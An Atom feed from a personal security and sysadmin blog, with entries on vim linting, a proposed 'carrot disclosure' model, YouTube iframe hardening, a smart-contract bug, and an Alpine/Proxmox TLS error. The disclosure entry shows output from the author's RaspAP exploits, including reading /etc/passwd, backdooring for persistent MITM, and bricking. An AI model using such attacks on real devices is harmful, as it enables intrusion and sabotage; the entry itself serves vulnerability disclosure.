1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
1001
1002
1003
1004
1005
1006
1007
1008
1009
1010
1011
1012
1013
1014
1015
1016
1017
1018
1019
1020
1021
1022
1023
1024
1025
1026
1027
1028
1029
1030
1031
1032
1033
1034
1035
1036
1037
1038
1039
1040
1041
1042
1043
1044
1045
1046
1047
1048
1049
1050
1051
1052
1053
1054
1055
1056
1057
1058
1059
1060
1061
1062
1063
1064
1065
1066
1067
1068
1069
1070
1071
1072
1073
1074
1075
1076
1077
1078
1079
1080
1081
1082
1083
1084
1085
1086
1087
1088
1089
1090
1091
1092
1093
1094
1095
1096
1097
1098
1099
1100
1101
1102
1103
1104
1105
1106
1107
1108
1109
1110
1111
1112
1113
1114
1115
1116
1117
1118
1119
1120
1121
1122
1123
1124
1125
1126
1127
1128
1129
1130
1131
1132
1133
1134
1135
1136
1137
1138
1139
1140
1141
1142
1143
1144
1145
1146
1147
1148
1149
1150
1151
1152
1153
1154
1155
1156
1157
1158
1159
1160
1161
1162
1163
1164
1165
1166
1167
1168
1169
1170
1171
1172
1173
1174
1175
1176
1177
1178
1179
1180
1181
1182
1183
1184
1185
1186
1187
1188
1189
1190
1191
1192
1193
1194
1195
1196
1197
1198
1199
1200
1201
1202
1203
1204
1205
1206
1207
1208
1209
1210
1211
1212
1213
1214
1215
1216
1217
1218
1219
1220
1221
1222
1223
1224
1225
1226
1227
1228
1229
1230
1231
1232
1233
1234
1235
1236
1237
1238
1239
1240
1241
1242
1243
1244
1245
1246
1247
1248
1249
1250
1251
1252
1253
1254
1255
1256
1257
1258
1259
1260
1261
1262
1263
1264
1265
1266
1267
1268
1269
1270
1271
1272
1273
1274
1275
1276
1277
1278
1279
1280
1281
1282
1283
1284
1285
1286
1287
1288
1289
1290
1291
1292
1293
1294
1295
1296
1297
1298
1299
1300
1301
1302
1303
1304
1305
1306
1307
1308
1309
1310
1311
1312
1313
1314
1315
1316
1317
1318
1319
1320
1321
1322
1323
1324
1325
1326
1327
1328
1329
1330
1331
1332
1333
1334
1335
1336
1337
1338
1339
1340
1341
1342
1343
1344
1345
1346
1347
1348
1349
1350
1351
1352
1353
1354
1355
1356
1357
1358
1359
1360
1361
1362
1363
1364
1365
1366
1367
1368
1369
1370
1371
1372
1373
1374
1375
1376
1377
1378
1379
1380
1381
1382
1383
1384
1385
1386
1387
1388
1389
1390
1391
1392
1393
1394
1395
1396
1397
1398
1399
1400
1401
1402
1403
1404
1405
1406
1407
1408
1409
1410
1411
1412
1413
1414
1415
1416
1417
1418
1419
1420
1421
1422
1423
1424
1425
1426
1427
1428
1429
1430
1431
1432
1433
1434
1435
1436
1437
1438
1439
1440
1441
1442
1443
1444
1445
1446
1447
1448
1449
1450
1451
1452
1453
1454
1455
1456
1457
1458
1459
1460
1461
1462
1463
1464
1465
1466
1467
1468
1469
1470
1471
1472
1473
1474
1475
1476
1477
1478
1479
1480
1481
1482
1483
1484
1485
1486
1487
1488
1489
1490
1491
1492
1493
1494
1495
1496
1497
1498
1499
1500
1501
1502
1503
1504
1505
1506
1507
1508
1509
1510
1511
1512
1513
1514
1515
1516
1517
1518
1519
1520
1521
1522
1523
1524
1525
1526
1527
1528
1529
1530
1531
1532
1533
1534
1535
1536
1537
1538
1539
1540
1541
1542
1543
1544
1545
1546
1547
1548
1549
1550
1551
1552
1553
1554
1555
1556
1557
1558
1559
1560
1561
1562
1563
1564
1565
1566
1567
1568
1569
1570
1571
1572
1573
1574
1575
1576
1577
1578
1579
1580
1581
1582
1583
1584
1585
1586
1587
1588
1589
1590
1591
1592
1593
1594
1595
1596
1597
1598
1599
1600
1601
1602
1603
1604
1605
1606
1607
1608
1609
1610
1611
1612
1613
1614
1615
1616
1617
1618
1619
1620
1621
1622
1623
1624
1625
1626
1627
1628
1629
1630
1631
1632
1633
1634
1635
1636
1637
1638
|
<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom"><title>Artificial truth</title><link href="https://dustri.org/b/" rel="alternate"></link><link href="https://dustri.org/b/atom.xml" rel="self"></link><id>https://dustri.org/b/</id><updated>2024-03-10T17:15:00+01:00</updated><entry><title>Using vale with vim</title><link href="https://dustri.org/b/using-vale-with-vim.html" rel="alternate"></link><published>2024-03-10T17:15:00+01:00</published><updated>2024-03-10T17:15:00+01:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2024-03-10:/b/using-vale-with-vim.html</id><summary type="html"><p><a href="https://en.wikipedia.org/wiki/LWN.net">LWN</a> recently published an excellent
(subscriber only) <a href="https://lwn.net/Articles/964075/">article</a> on
<a href="https://vale.sh/">vale</a>, an <em>editorial style</em> linter. One of the original goal
of this little corner on the internet was to improve my English, a purpose it
keeps serving. Adding some lightweight tooling to my text editor to push this
goal even further …</p></summary><content type="html"><p><a href="https://en.wikipedia.org/wiki/LWN.net">LWN</a> recently published an excellent
(subscriber only) <a href="https://lwn.net/Articles/964075/">article</a> on
<a href="https://vale.sh/">vale</a>, an <em>editorial style</em> linter. One of the original goal
of this little corner on the internet was to improve my English, a purpose it
keeps serving. Adding some lightweight tooling to my text editor to push this
goal even further sounds great.</p>
<p>Like all good software, vale <a href="https://gitlab.alpinelinux.org/alpine/aports/-/tree/master/testing/vale">is
packaged</a>
in Alpine, although it looked a tad neglected, so I sent <a href="https://gitlab.alpinelinux.org/alpine/aports/-/merge_requests/61919">a
pull-request</a>
to get it updated.
Its configuration is pretty straightforward: a <code>~/.vale.ini</code> file, with
where to store/read its data and some preferences. It comes with a
<a href="https://vale.sh/hub/">couple of <em>packages</em></a> for popular styles, like the ones
from <a href="https://vale.sh/hub/microsoft/">Microsoft</a>,
<a href="https://vale.sh/hub/google/">Google</a>, <a href="https://vale.sh/hub/redhat/">RedHat</a>, … then a simple <code>vale sync</code> to force it to
download and store the data, and you're good to go.</p>
<p>While <code>vale</code> can be called from the command line, integration with my text
editor is way more comfy. I'm sure there are a ton of plugins to integrate it
with vim, but I'm not a huge fan of having my text editor run arbitrary code
from the internet, so I threw the following 6 lines in <a href="https://dustri.org/pub/vimrc">my vimrc</a> instead:</p>
<div class="codehilite"><pre><span></span><code><span class="nv">augroup</span><span class="w"> </span><span class="nv">vale</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="nv">filereadable</span><span class="ss">(</span><span class="nv">expand</span><span class="ss">(</span><span class="s2">&quot;~/.vale.ini&quot;</span><span class="ss">))</span>
<span class="w"> </span><span class="nv">autocmd</span><span class="w"> </span><span class="nv">FileType</span><span class="w"> </span><span class="nv">markdown</span><span class="w"> </span><span class="nv">setlocal</span><span class="w"> </span><span class="nv">makeprg</span><span class="o">=</span><span class="nv">vale</span>\<span class="w"> </span><span class="o">--</span><span class="nv">output</span><span class="o">=</span><span class="nv">line</span>\<span class="w"> </span><span class="o">%</span><span class="w"> </span><span class="nv">errorformat</span><span class="o">=%</span><span class="nv">f</span>:<span class="o">%</span><span class="nv">l</span>:<span class="o">%</span><span class="nv">c</span>:<span class="o">%</span><span class="nv">o</span>:<span class="o">%</span><span class="nv">m</span>
<span class="w"> </span><span class="nv">nnoremap</span><span class="w"> </span><span class="o">&lt;</span><span class="nv">Leader</span><span class="o">&gt;</span><span class="nv">M</span><span class="w"> </span>:<span class="nv">make</span><span class="o">&lt;</span><span class="nv">CR</span><span class="o">&gt;&lt;</span><span class="nv">CR</span><span class="o">&gt;</span>
<span class="w"> </span><span class="k">end</span>
<span class="nv">augroup</span><span class="w"> </span><span class="k">end</span>
</code></pre></div>
<p>It checks if I have a <code>~/vale.ini</code> file, and if so sets
<a href="https://vimhelp.org/options.txt.html#%27makeprg%27"><code>makeprg</code></a> to vale, and
configure <a href="https://vimhelp.org/quickfix.txt.html#errorformat"><code>errorformat</code></a> to
properly parse vale's output. Now every time I type <code>&lt;Leader&gt; M</code>, I get vale's
diagnostics in my <a href="https://vimhelp.org/quickfix.txt.html">quickfix window</a>.</p>
<p>The next steps would likely be to <s>waste</s> spend some time improving the theme
of the aforementioned window, add some ad hoc rules to vale, and maybe try to
show the diagnostics inline like the spellechecker is doing.</p></content><category term="sysadmin"></category></entry><entry><title>Carrot disclosure</title><link href="https://dustri.org/b/carrot-disclosure.html" rel="alternate"></link><published>2024-03-08T21:30:00+01:00</published><updated>2024-03-08T21:30:00+01:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2024-03-08:/b/carrot-disclosure.html</id><summary type="html"><p>Once you have found a vulnerability, you can either sit on it, or disclose it.
There are usually two ways to disclose, with minor variations:</p>
<ol>
<li><a href="https://en.wikipedia.org/wiki/Coordinated_vulnerability_disclosure">Coordinated Disclosure</a>,
where one gives time to the vendor to issue a fix before disclosing</li>
<li><a href="https://en.wikipedia.org/wiki/Full_disclosure_(computer_security)">Full Disclosure</a>,
where one discloses immediately without notifying anyone before …</li></ol></summary><content type="html"><p>Once you have found a vulnerability, you can either sit on it, or disclose it.
There are usually two ways to disclose, with minor variations:</p>
<ol>
<li><a href="https://en.wikipedia.org/wiki/Coordinated_vulnerability_disclosure">Coordinated Disclosure</a>,
where one gives time to the vendor to issue a fix before disclosing</li>
<li><a href="https://en.wikipedia.org/wiki/Full_disclosure_(computer_security)">Full Disclosure</a>,
where one discloses immediately without notifying anyone before.</li>
</ol>
<p>I would like to coin a 3<sup>rd</sup> one: <em>Carrot Disclosure</em>, dangling a
<a href="https://en.wikipedia.org/wiki/Carrot_and_stick">metaphorical carrot</a> in front
of the vendor to incentivise change. The main idea is to only publish the
(redacted) output of the exploit for a critical vulnerability, to showcase that the
software is exploitable. Now the vendor has two choices: either perform a
holistic audit of its software, fixing as many issues as possible in the hope
of fixing the showcased vulnerability; or losing users who might not be happy
running a known-vulnerable software. Users of this disclosure model are of
course called Bugs Bunnies.</p>
<p>We all looked at catastrophic web applications, finding a ton
of bugs, and deciding not to bother with reporting them, because they were too
many of them, because we knew that there will be more of them lurking, because
the vendor is a complete tool and it would take more time trying to properly
disclose things than it took finding the vulnerabilities, … This is an
excellent use case for Carrot Disclosure! Of course, for unauditably-large
codebases, it doesn't work: you've got a Linux LPE, who cares.</p>
<p>Interestingly, it shifts the work balance a bit: it's usually harder to write
an exploit than it's to fix here. But here, the vendor has to audit and fix
its entire codebase, for the ~low cost of one (1) exploit, that you don't even
have to publish if you don't want to.</p>
<p>If you want to be extra-nice, you can:</p>
<ul>
<li>Publish the SHA256 of the exploit, to prove
that you weren't making things up, once it's fixed or if you get sued for
whatever frivolous reasons like libel.</li>
<li>Maintain the exploits against new versions, proving that the exploit is still
working.</li>
<li>Publish the exploit once it has been fixed, otherwise you risk to have
vendors call your bluff next time, or at least notify that the issue has been
fixed. Since you don't have hardcoded offsets because we're in 2024, you can even
put this in a continuous integration.</li>
</ul>
<p>Let's have an example, as a treat. A couple of shitty vulnerabilities for
<a href="https://raspap.com/">RaspAP</a> that took me 5 minutes to find and at least 5
more to write an exploit for each of them:</p>
<div class="codehilite"><pre><span></span><code><span class="gp">$ </span>./read-raspap.py<span class="w"> </span><span class="m">10</span>.3.141.1<span class="w"> </span>/etc/passwd<span class="w"> </span><span class="p">|</span><span class="w"> </span>head<span class="w"> </span>-n<span class="w"> </span><span class="m">5</span>
<span class="go">[+] Target is running RaspAP</span>
<span class="go">[+] Dumping /etc/passwd</span>
<span class="go">root:x:0:0:root:/root:/bin/bash</span>
<span class="go">daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin</span>
<span class="go">bin:x:2:2:bin:/bin:/usr/sbin/nologin</span>
<span class="gp">$ </span>./authed-mitm-raspap.py<span class="w"> </span><span class="m">10</span>.3.141.1
<span class="go">[+] default login/password in use</span>
<span class="go">[+] backdooring system…</span>
<span class="go">[+] system backdoored, enjoy your permanent MITM!</span>
<span class="gp">$ </span>./brick-raspap.py<span class="w"> </span><span class="m">10</span>.3.141.1
<span class="go">[+] Target is running RaspAP</span>
<span class="go">[+] Bricking the system…</span>
<span class="go">[+] System bricked!</span>
<span class="gp">$</span>
</code></pre></div>
<p>It looks like there is a low-hanging unauthenticated arbitrary code execution
chainable with a privilege escalation to root as well, but since writing an
exploit would take more than 5 minutes, I can't be bothered, and odds are that
it'll be fixed along with the persistent denial-of-service anyway. Let me know
when you think those are fixed.</p></content><category term="security"></category></entry><entry><title>Youtube video embedding harm reduction</title><link href="https://dustri.org/b/youtube-video-embedding-harm-reduction.html" rel="alternate"></link><published>2024-02-27T14:45:00+01:00</published><updated>2024-02-27T14:45:00+01:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2024-02-27:/b/youtube-video-embedding-harm-reduction.html</id><summary type="html"><p>Embedding external content on a website in the current enshittocene period is
more annoying than ever, so here is a copy-pasteable snippet to embed a youtube
video while reducing its tracking and nuisance capabilities as much as possible:</p>
<div class="codehilite"><pre><span></span><code><span class="p">&lt;</span><span class="nt">iframe</span>
<span class="na">credentialless</span>
<span class="na">allowfullscreen</span>
<span class="na">referrerpolicy</span><span class="o">=</span><span class="s">&quot;no-referrer&quot;</span>
<span class="na">sandbox</span><span class="o">=</span><span class="s">&quot;allow-scripts allow-same-origin&quot;</span>
<span class="na">allow</span><span class="o">=</span><span class="s">&quot;accelerometer &#39;none&#39;; ambient-light-sensor …</span></code></pre></div></summary><content type="html"><p>Embedding external content on a website in the current enshittocene period is
more annoying than ever, so here is a copy-pasteable snippet to embed a youtube
video while reducing its tracking and nuisance capabilities as much as possible:</p>
<div class="codehilite"><pre><span></span><code><span class="p">&lt;</span><span class="nt">iframe</span>
<span class="na">credentialless</span>
<span class="na">allowfullscreen</span>
<span class="na">referrerpolicy</span><span class="o">=</span><span class="s">&quot;no-referrer&quot;</span>
<span class="na">sandbox</span><span class="o">=</span><span class="s">&quot;allow-scripts allow-same-origin&quot;</span>
<span class="na">allow</span><span class="o">=</span><span class="s">&quot;accelerometer &#39;none&#39;; ambient-light-sensor &#39;none&#39;; autoplay &#39;none&#39;; battery &#39;none&#39;; bluetooth &#39;none&#39;; browsing-topics &#39;none&#39;; camera &#39;none&#39;; ch-ua &#39;none&#39;; display-capture &#39;none&#39;; domain-agent &#39;none&#39;; document-domain &#39;none&#39;; encrypted-media &#39;none&#39;; execution-while-not-rendered &#39;none&#39;; execution-while-out-of-viewport &#39;none&#39;; gamepad &#39;none&#39;; geolocation &#39;none&#39;; gyroscope &#39;none&#39;; hid &#39;none&#39;; identity-credentials-get &#39;none&#39;; idle-detection &#39;none&#39;; keyboard-map &#39;none&#39;; local-fonts &#39;none&#39;; magnetometer &#39;none&#39;; microphone &#39;none&#39;; midi &#39;none&#39;; navigation-override &#39;none&#39;; otp-credentials &#39;none&#39;; payment &#39;none&#39;; picture-in-picture &#39;none&#39;; publickey-credentials-create &#39;none&#39;; publickey-credentials-get &#39;none&#39;; screen-wake-lock &#39;none&#39;; serial &#39;none&#39;; speaker-selection &#39;none&#39;; sync-xhr &#39;none&#39;; usb &#39;none&#39;; web-share &#39;none&#39;; window-management &#39;none&#39;; xr-spatial-tracking &#39;none&#39;&quot;</span><span class="err">,</span>
<span class="na">csp</span><span class="o">=</span><span class="s">&quot;sandbox allow-scripts allow-same-origin;&quot;</span>
<span class="na">width</span><span class="o">=</span><span class="s">&quot;560&quot;</span>
<span class="na">height</span><span class="o">=</span><span class="s">&quot;315&quot;</span>
<span class="na">src</span><span class="o">=</span><span class="s">&quot;https://www.youtube-nocookie.com/embed/jfKfPfyJRdk&quot;</span>
<span class="na">title</span><span class="o">=</span><span class="s">&quot;lofi hip hop radio 📚 - beats to relax/study to&quot;</span>
<span class="na">frameborder</span><span class="o">=</span><span class="s">&quot;0&quot;</span>
<span class="na">loading</span><span class="o">=</span><span class="s">&quot;lazy&quot;</span>
<span class="p">&gt;&lt;/</span><span class="nt">iframe</span><span class="p">&gt;</span>
</code></pre></div>
<ul>
<li><a href="https://developer.mozilla.org/en-US/docs/Web/Security/IFrame_credentialless"><code>credentialless</code></a> to load youtube in a blank disposable context,
without access to the origin's network, cookies, and storage data.</li>
<li><code>allowfullscreen</code> because some people like it</li>
<li><code>referrerpolicy</code> set to not leak your <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referer">referer</a></li>
<li><code>sandbox</code> to only allow javascript execution and SOP. Downloads, forms,
modals, screen orientation, pointer lock, popups, presentation session,
<a href="https://developer.mozilla.org/en-US/docs/Web/API/Storage_Access_API">storage access</a> and thus third-party cookies,
top-navigation, … are all denied.</li>
<li><code>allow</code> with <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Permissions-Policy#directives">every single directives</a>
set to "absolutely-fucking-not", and yes, they have to be all set one by one,
and check regularly is new directive were added,
because there is <a href="https://github.com/w3c/webappsec-permissions-policy/issues/208">no deny-all</a>
in the <a href="https://w3c.github.io/webappsec-permissions-policy/">spec</a>. It seems
that every browser has its own list of directives, chrome is using <a href="https://github.com/w3c/webappsec-permissions-policy/blob/main/features.md">this one</a>
while firefox' prefers the <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Permissions-Policy#directives">MDN one</a>,
and of course the two differ. No doubt this was designed with privacy, simplicity, maintainability and security in mind.</li>
<li><code>src</code> set to <code>www.youtube-nocookie.com</code> instead of <code>youtube.com</code>. Both
are official Google urls, but the former doesn't do tracking via cookies,
and disables API and interaction and interaction logging. Amusingly, it's
the player used on <code>whitehouse.gov</code>.</li>
<li><code>csp</code> set to <code>sandbox allow-scripts allow-same-origin;</code> for compatibility's
sake, just in case.
I'd love to use a more restrictive policy, but the spec doesn't allow to
provide one, except if the embedded website explicitly allows it, and of
course youtube doesn't.</li>
<li><code>loading="lazy"</code> in case people don't scroll far enough to see the video, no
need to make them do queries to Google for no reasons.</li>
</ul>
<p>Don't forget to put a <code>title</code> for <a href="https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe#accessibility_concerns">accessibility's sake</a>.</p></content><category term="web"></category></entry><entry><title>A silly "smart" contract bug</title><link href="https://dustri.org/b/a-silly-smart-contract-bug.html" rel="alternate"></link><published>2024-02-16T13:30:00+01:00</published><updated>2024-02-16T13:30:00+01:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2024-02-16:/b/a-silly-smart-contract-bug.html</id><summary type="html"><p>I was idling on a <a href="https://github.com/stypr">friend</a>'s Discord server,
when he posted a small snippet of code, taken from a <a href="https://app.sentio.xyz/tx/1/0x4b9de8c56c8919e8598181449a3cc02df40435eb641eaec08ecce12d2342237f/contracts">smart contract</a>
apparently swapping <a href="https://academy.binance.com/en/articles/what-is-wrapped-ether-weth-and-how-to-wrap-it">WETH</a> to <a href="https://miner.build/">MINER</a>, but who cares, what's
interesting here is the bug, can you spot it?</p>
<div class="codehilite"><pre><span></span><code><span class="kt">function</span><span class="w"> </span><span class="nv">_update</span><span class="p">(</span><span class="kt">address</span><span class="w"> </span><span class="nv">from</span><span class="p">,</span><span class="w"> </span><span class="kt">address</span><span class="w"> </span><span class="nv">to</span><span class="p">,</span><span class="w"> </span><span class="kt">uint256</span><span class="w"> </span><span class="nv">value</span><span class="p">,</span><span class="w"> </span><span class="kt">bool</span><span class="w"> </span><span class="nv">mint …</span></code></pre></div></summary><content type="html"><p>I was idling on a <a href="https://github.com/stypr">friend</a>'s Discord server,
when he posted a small snippet of code, taken from a <a href="https://app.sentio.xyz/tx/1/0x4b9de8c56c8919e8598181449a3cc02df40435eb641eaec08ecce12d2342237f/contracts">smart contract</a>
apparently swapping <a href="https://academy.binance.com/en/articles/what-is-wrapped-ether-weth-and-how-to-wrap-it">WETH</a> to <a href="https://miner.build/">MINER</a>, but who cares, what's
interesting here is the bug, can you spot it?</p>
<div class="codehilite"><pre><span></span><code><span class="kt">function</span><span class="w"> </span><span class="nv">_update</span><span class="p">(</span><span class="kt">address</span><span class="w"> </span><span class="nv">from</span><span class="p">,</span><span class="w"> </span><span class="kt">address</span><span class="w"> </span><span class="nv">to</span><span class="p">,</span><span class="w"> </span><span class="kt">uint256</span><span class="w"> </span><span class="nv">value</span><span class="p">,</span><span class="w"> </span><span class="kt">bool</span><span class="w"> </span><span class="nv">mint</span><span class="p">)</span><span class="w"> </span><span class="kt">internal</span><span class="w"> </span>virtual<span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="kt">uint256</span><span class="w"> </span><span class="nv">fromBalance</span><span class="w"> </span><span class="o">=</span><span class="w"> </span>_balances<span class="p">[</span>from<span class="p">];</span>
<span class="w"> </span><span class="kt">uint256</span><span class="w"> </span><span class="nv">toBalance</span><span class="w"> </span><span class="o">=</span><span class="w"> </span>_balances<span class="p">[</span>to<span class="p">];</span>
<span class="w"> </span><span class="kt">if</span><span class="w"> </span><span class="p">(</span>fromBalance<span class="w"> </span><span class="o">&lt;</span><span class="w"> </span>value<span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span>revert<span class="w"> </span>ERC20InsufficientBalance<span class="p">(</span>from<span class="p">,</span><span class="w"> </span>fromBalance<span class="p">,</span><span class="w"> </span>value<span class="p">);</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span>unchecked<span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="c1">// Overflow not possible: value &lt;= fromBalance &lt;= totalSupply.</span>
<span class="w"> </span>_balances<span class="p">[</span>from<span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span>fromBalance<span class="w"> </span><span class="o">-</span><span class="w"> </span>value<span class="p">;</span>
<span class="w"> </span><span class="c1">// Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.</span>
<span class="w"> </span>_balances<span class="p">[</span>to<span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span>toBalance<span class="w"> </span><span class="o">+</span><span class="w"> </span>value<span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
</code></pre></div>
<p>As a hint, look at <a href="https://app.sentio.xyz/tx/1/0x4b9de8c56c8919e8598181449a3cc02df40435eb641eaec08ecce12d2342237f">this transaction</a>.
Isn't it a cute bugdoor?</p>
<p>The snippet is taken from <a href="https://twitter.com/shoucccc/status/1757777764646859121">this tweet</a>,
giving the issue away. Thanks to <a href="https://github.com/kjsman">Jinseo Kim</a> for holding my hand
understanding what was going on there.</p></content><category term="security"></category></entry><entry><title>Fixing the /usr/lib/ssl/certs debacle with Alpine Linux on Proxmox</title><link href="https://dustri.org/b/fixing-the-usrlibsslcerts-debacle-with-alpine-linux-on-proxmox.html" rel="alternate"></link><published>2024-02-05T17:00:00+01:00</published><updated>2024-02-05T17:00:00+01:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2024-02-05:/b/fixing-the-usrlibsslcerts-debacle-with-alpine-linux-on-proxmox.html</id><summary type="html"><p>There are currently some issues with regard to OpenSSL and Alpine Linux on
Proxmox, tracked as <a href="https://bugzilla.proxmox.com/show_bug.cgi?id=5194">#5194</a> by Promox since the 19<sup>th</sup> of January, with some patches sent by
email (sigh) to fix the issue still waiting to land. The root cause being
Proxmox setting <code>SSL_CERT_FILE='/usr/lib/ssl …</code></p></summary><content type="html"><p>There are currently some issues with regard to OpenSSL and Alpine Linux on
Proxmox, tracked as <a href="https://bugzilla.proxmox.com/show_bug.cgi?id=5194">#5194</a> by Promox since the 19<sup>th</sup> of January, with some patches sent by
email (sigh) to fix the issue still waiting to land. The root cause being
Proxmox setting <code>SSL_CERT_FILE='/usr/lib/ssl/cert.pem'</code> when <code>pct enter</code> is
used, while on Alpine the <code>cert.pem</code> file is in <code>/etc/ssl/cert.pem</code>.</p>
<p>In the meantime, here is what the problem looks like (for
<a href="https://en.wikipedia.org/wiki/Search_engine_optimization">SEO</a>) and how to
hack around it: </p>
<div class="codehilite"><pre><span></span><code><span class="go">root@pve ~ pct enter 122</span>
<span class="gp"># </span>apk<span class="w"> </span>update
<span class="go">fetch https://dl-cdn.alpinelinux.org/alpine/v3.18/main/x86_64/APKINDEX.tar.gz</span>
<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
<span class="go">48AB2E51FA7F0000:error:0A000086:SSL routines:tls_post_process_server_certificate:certificate verify failed:ssl/statem/statem_clnt.c:1889:</span>
<span class="go">WARNING: updating and opening https://dl-cdn.alpinelinux.org/alpine/v3.18/main: Permission denied</span>
<span class="go">fetch https://dl-cdn.alpinelinux.org/alpine/v3.18/community/x86_64/APKINDEX.tar.gz</span>
<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
<span class="go">48AB2E51FA7F0000:error:0A000086:SSL routines:tls_post_process_server_certificate:certificate verify failed:ssl/statem/statem_clnt.c:1889:</span>
<span class="go">WARNING: updating and opening https://dl-cdn.alpinelinux.org/alpine/v3.18/community: Permission denied</span>
